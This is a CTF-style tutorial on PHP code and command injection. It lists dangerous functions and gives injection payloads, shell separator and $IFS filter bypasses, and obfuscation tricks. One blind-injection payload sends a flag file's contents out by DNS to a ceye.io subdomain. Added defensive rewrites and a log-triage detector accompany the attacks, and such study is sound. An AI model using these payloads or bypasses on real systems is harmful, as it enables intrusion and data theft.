
Title: Command execution vulnerability in CTF


Command execution vulnerabilities in CTF

Because the code passes user-controlled input, without filtering, into functions that can execute PHP code or system commands, a user can submit malicious statements and have the server execute them.

The root cause of this class of attack is that the web application does not validate the parameters it hands to functions such as system(), eval() and exec().

1 Code injection

1.1 Related functions

1.1.1 eval

<?php
highlight_file(__FILE__);
$a = 'phpinfo();';
eval($a);   // the string in $a is compiled and run as PHP
?>

1.1.2 assert


1.1.3 call_user_func

You can use is_callable() to check whether a value can be invoked as a callback.

1.1.4 call_user_func_array


1.1.5 create_function


1.1.6 preg_replace

Searches subject for matches to pattern and replaces them with replacement. With the /e modifier (deprecated in PHP 5.5 and removed in PHP 7.0) the replacement string is evaluated as PHP code, which is what turns preg_replace() into a code-injection sink.

1.1.7 array_map

Payload: url?a=assert&b=phpinfo()

1.1.8 usort

Payload: url?1[]=phpinfo()&1[]=123&2=assert

1.1.9 uasort


1.1.10 ${php code}

1.2 DEMO

<?php
highlight_file(__FILE__);
$price = $_GET['price'];
// The message text was garbled in extraction; " costs " is a reconstruction.
// What matters is the structure: $price is spliced into PHP source code.
$code = 'echo $name . " costs " . ' . $price . ';';
$b = create_function('$name', $code);   // compiles $code as a function body; removed in PHP 8.0
$b('iPhone');
?>

Payload: url?price=123;}phpinfo();/*
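The payload works because create_function() compiles its second argument as PHP source, so whatever is in $price becomes code. The following is an added example, not code from the original post: the same DEMO rewritten so that the price is only ever data. The function name make_price_printer and the " costs " wording are this example's own choices.

```php
<?php
// Added example (not from the original post): the create_function() DEMO
// rewritten so user input never becomes PHP source code.
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0;
// a real closure captures $price as a value, so the "123;}phpinfo();/*"
// payload is printed back verbatim instead of being executed.

function make_price_printer(string $price): Closure
{
    // Allow-list validation: a price is digits with an optional decimal part.
    if (!preg_match('/^\d+(\.\d{1,2})?$/', $price)) {
        throw new InvalidArgumentException('price must be a number');
    }
    // $price is captured by value; nothing here is compiled from a string.
    return function (string $name) use ($price): string {
        return $name . ' costs ' . $price;
    };
}

// Request handling (structure and names are this example's own).
$price = (string)($_GET['price'] ?? '');
try {
    $printer = make_price_printer($price);
    echo htmlspecialchars($printer('iPhone'), ENT_QUOTES, 'UTF-8'), "\n";
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo "invalid price\n";
}
```

Two things change: the closure removes the string-to-code step entirely, and the regular expression rejects anything that is not a number before it is used, so the metacharacters the payload relies on never reach the application logic. When reviewing a code base, grepping for create_function, eval, assert and preg_replace with /e is the quickest way to find the sinks listed in section 1.1.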

2 Command injection

2.1 Related functions

2.1.1 system


2.1.2 exec


2.1.3 passthru


2.1.4 shell_exec

2.1.5 The backtick operator ``

2.1.6 ob_start

2.2 Bypasses for command execution

2.2.1 Command separators

For example:

<?php
highlight_file(__FILE__);
$rce = 'echo 123';
system($rce . $_GET[1]);   // parameter 1 is appended to the command line unchanged
?>

Ways to chain a second command onto the first:

Line break %0a

Carriage return %0d

Sequential execution ;

Background execution &

Pipe |

Logical operators || and &&

2.2.2 Separators: substitutes for a space

Symbols that can stand in for a space when spaces are filtered:

$IFS

${IFS}

$IFS$9

%09 (a tab) when sent through the URL

${9}
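Sections 2.2.1 and 2.2.2 together give a compact list of what an injected parameter tends to contain. As an added example (not part of the original post), the following triage helper decodes the query string of each request line and reports which of those separators and space substitutes appear in a parameter value. The function names, the marker table and the sample request lines are all constructed for this example.

```php
<?php
// Added example (not from the original post): a log-triage heuristic that
// flags request parameters carrying the shell separators (2.2.1) and space
// substitutes (2.2.2). It is an aid for reviewing access logs or writing a
// WAF rule, not a sanitiser: the fix for command injection is to stop
// handing user input to a shell at all.

const SHELL_MARKERS = [
    'newline'     => "\n",
    'carriage'    => "\r",
    'semicolon'   => ';',
    'background'  => '&',
    'pipe'        => '|',
    'backtick'    => '`',
    'subshell'    => '$(',
    'IFS'         => '$IFS',    // also covers $IFS$9
    'IFS-braced'  => '${IFS}',
    'tab'         => "\t",      // %09 once url-decoded
    'positional'  => '${9}',
];

/** Names of every marker present in an already url-decoded value. */
function find_shell_markers(string $value): array
{
    $found = [];
    foreach (SHELL_MARKERS as $name => $needle) {
        if (strpos($value, $needle) !== false) {
            $found[] = $name;
        }
    }
    return $found;
}

/** Parse the request target of an access-log line; map parameter => markers. */
function triage_request(string $line): array
{
    $parts  = explode(' ', $line);            // "GET /path?query HTTP/1.1"
    $target = $parts[1] ?? '';
    $query  = parse_url($target, PHP_URL_QUERY) ?? '';
    parse_str($query, $params);               // parse_str() url-decodes values
    $hits = [];
    foreach ($params as $key => $value) {
        if (!is_string($value)) {
            continue;                         // skip array parameters such as 1[]=...
        }
        $markers = find_shell_markers($value);
        if ($markers) {
            $hits[$key] = $markers;
        }
    }
    return $hits;
}

// Constructed sample request lines, not real traffic.
$sample_requests = [
    'GET /ping.php?ping=127.0.0.1 HTTP/1.1',
    'GET /ping.php?ping=127.0.0.1%3Bid HTTP/1.1',                         // ;
    'GET /ping.php?ping=127.0.0.1%0acat%24%7BIFS%7D1.txt HTTP/1.1',       // %0a + ${IFS}
    'GET /cmd.php?1=%7Cls%09-la HTTP/1.1',                                // | + %09
];
foreach ($sample_requests as $line) {
    $hits = triage_request($line);
    printf("%-64s %s\n", $line, $hits ? json_encode($hits) : 'clean');
}
```

Because parse_str() splits on & and decodes percent escapes, a literal & only reaches the value if it was sent as %26, which is exactly the form an attacker has to use; the decoded value is what the shell would have seen, so that is what the heuristic inspects.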

2.2.3 Other tips

2.2.3.1 Command concatenation


$a=l;$b=s;$a$b

2.2.3.2 base64 encoding

`echo cHdk | base64 -D`   (the decode flag is -d with GNU coreutils)

2.2.3.3 expr substr STRING POS LEN

Extracts the substring of length LEN from STRING starting at position POS (counted from 1). If POS or LEN is not a positive integer, the result is an empty string.

echo "${PATH:0:1}"   # prints /

echo '`expr\$IFS\substr\$IFS\\$(pwd)\\$IFS\1\$IFS\1`'

echo `$(expr${IFS}substr${IFS}$PWD${IFS}1${IFS}1)`   # /

expr${IFS}substr${IFS}$SESSION_MANAGER${IFS}6${IFS}1${IFS}1

2.3 Commands with no output echoed

2.3.1 Confirming execution

Time delay

ls|sleep 3

HTTP Request

DNS Request

ceye.io

2.3.2 Exploitation

Write a shell (write it directly, or download it from an external host)

Bring the result out over HTTP, DNS or a similar channel

2.3.3 DEMO

<?php
highlight_file(__FILE__);
include('where_is_flag.php');
echo 'ping:';
$ip = (string)$_GET['ping'];
$ip = str_replace('', '0.0', $ip);
shell_exec('ping ' . $ip);   // output is discarded, so nothing is echoed back
?>

payload:


ip=;cp where_is_flag.php 1.txt

ip=`cat 1.txt|sed s/[[:space:]]//`.xx.ceye.io

Tip

cat 1.txt|sed s/[[:space:]]//g strips the whitespace from the file contents so they can be carried in a hostname.
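The DEMO is exploitable because the only control on $ip is a str_replace() blacklist, and sections 2.2.1 and 2.2.2 list how many alternatives the shell accepts for anything a blacklist removes. The following is an added example, not code from the original post: the same ping handler with an allow-list check and shell quoting. The function name safe_ping and the -c count are this example's own choices.

```php
<?php
// Added example (not from the original post): the 2.3.3 ping handler rewritten
// so the parameter can no longer carry a command. Two independent controls:
// an allow-list check (is the value an IP literal at all?) and escapeshellarg(),
// which quotes whatever does reach the shell. Removing characters with
// str_replace(), as the DEMO does, is a blacklist and is bypassed with the
// separators and space substitutes from section 2.2.

/** Ping $ip if it is a valid IPv4/IPv6 literal; return the output, or null if rejected. */
function safe_ping(string $ip, int $count = 1): ?string
{
    // Control 1: allow-list. filter_var() returns false for anything that is
    // not a syntactically valid IP address, which rules out ; | ` $( $IFS and
    // newlines without having to enumerate them.
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // Control 2: even a validated value is quoted before it touches the shell,
    // so the command line has exactly one argument where the address goes.
    $cmd = 'ping -c ' . $count . ' ' . escapeshellarg($ip) . ' 2>&1';
    $out = shell_exec($cmd);
    return $out === null ? '' : $out;   // null means no output, not rejection
}

// Request handling (structure is this example's own).
$ip     = (string)($_GET['ping'] ?? '');
$result = safe_ping($ip);
if ($result === null) {
    http_response_code(400);
    echo "ping: invalid address\n";
} else {
    echo 'ping: ', htmlspecialchars($result, ENT_QUOTES, 'UTF-8'), "\n";
}
```

The validation alone would already stop every payload in this post, but keeping escapeshellarg() as a second layer means a later change to the allow-list (say, accepting hostnames) does not silently reopen the injection. Returning the output also removes the "no echo" condition that forces the DNS exfiltration trick in 2.3.2, which is a reason to be deliberate about whether command output should ever be shown to the user.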
